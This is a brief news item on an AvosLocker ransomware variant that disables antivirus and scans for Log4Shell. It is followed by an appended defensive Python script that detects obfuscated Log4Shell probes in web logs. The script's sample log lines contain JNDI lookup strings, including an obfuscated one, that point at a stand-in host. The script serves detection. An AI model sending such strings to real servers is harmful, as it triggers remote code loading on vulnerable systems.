New AvosLocker Variant Disables AV To Evade Detection

Trend Micro researchers have discovered a new variant of AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. This is the first sample observed from the US with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file. The ransomware is also capable of scanning multiple endpoints for Log4Shell.

Chris Olson, CEO of The Media Trust, had this to say:

“Like many other ransomware attacks from recent memory, the new AvosLocker variant targeted a vulnerable third-party service (in this case, a web-based password locker). As organizations come to rely more and more on digital tools and services to run their business, they should learn about the dangers of digital supply chain attacks and continually monitor their partners to enforce trust and safety standards. Just as AvosLocker evades detection in the course of a breach, Web and mobile apps are increasingly targeted by cyber actors using sophisticated techniques such as obfuscated and polymorphic code to dodge blockers or URL filters.”

The fact that this new variant leverages Log4Shell and takes such evasive action shows how dangerous it is. It also means you should make sure you are fully up to date on security patches and antivirus definitions so that you don't become the next victim of this variant.
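One defender-side check for the Log4Shell scanning the article mentions, as an added example that is not from the article or from Trend Micro's report: a small Python routine that collapses Log4j nested-lookup obfuscation before searching web-server log lines for JNDI lookups. The log lines, IP addresses and host names below are constructed for the example.

```python
import re

# Constructed sample access-log lines (not from the article). Two carry
# Log4Shell-style probes, one of them with nested-lookup obfuscation.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2022:10:00:02 +0000] "GET /admin HTTP/1.1" 404 0 "-" "${jndi:ldap://scanner.invalid/a}"
10.0.0.9 - - [01/Jan/2022:10:00:03 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${lower:j}${::-n}di:${lower:rmi}://scanner.invalid/b}"
10.0.0.7 - - [01/Jan/2022:10:00:04 +0000] "GET /price?amount=${total} HTTP/1.1" 200 77 "-" "curl/7.68"
"""

# One Log4j lookup with no nested "${" inside it (an innermost lookup).
_INNER = re.compile(r"\$\{([^${}]*)\}")

def _resolve(lookup: str) -> str:
    """Approximate how Log4j 2.x evaluates one innermost lookup, so obfuscated
    text is reduced to the literal characters it spells out."""
    if ":" not in lookup:
        return "${" + lookup + "}"          # plain key such as ${total}: leave as-is
    prefix, _, rest = lookup.partition(":")
    if prefix in ("lower", "upper"):
        return rest.lower() if prefix == "lower" else rest.upper()
    # ${::-x} and ${env:UNSET:-x} evaluate to the default value after ":-".
    if ":-" in lookup:
        return lookup.rsplit(":-", 1)[1]
    return "${" + lookup + "}"              # keep anything else (e.g. jndi:...) for the final check

def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until the text stops changing."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text

JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)

def find_log4shell_probes(log: str) -> list[tuple[str, str]]:
    """Return (client_ip, normalized_line) for every line containing a JNDI lookup."""
    hits = []
    for line in log.splitlines():
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((line.split(" ", 1)[0], norm))
    return hits

if __name__ == "__main__":
    for ip, line in find_log4shell_probes(SAMPLE_LOG):
        print(ip, "->", line)
```

Matching only the literal string `${jndi:` misses the obfuscated third line; normalizing first catches it while leaving the benign `${total}` parameter alone.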
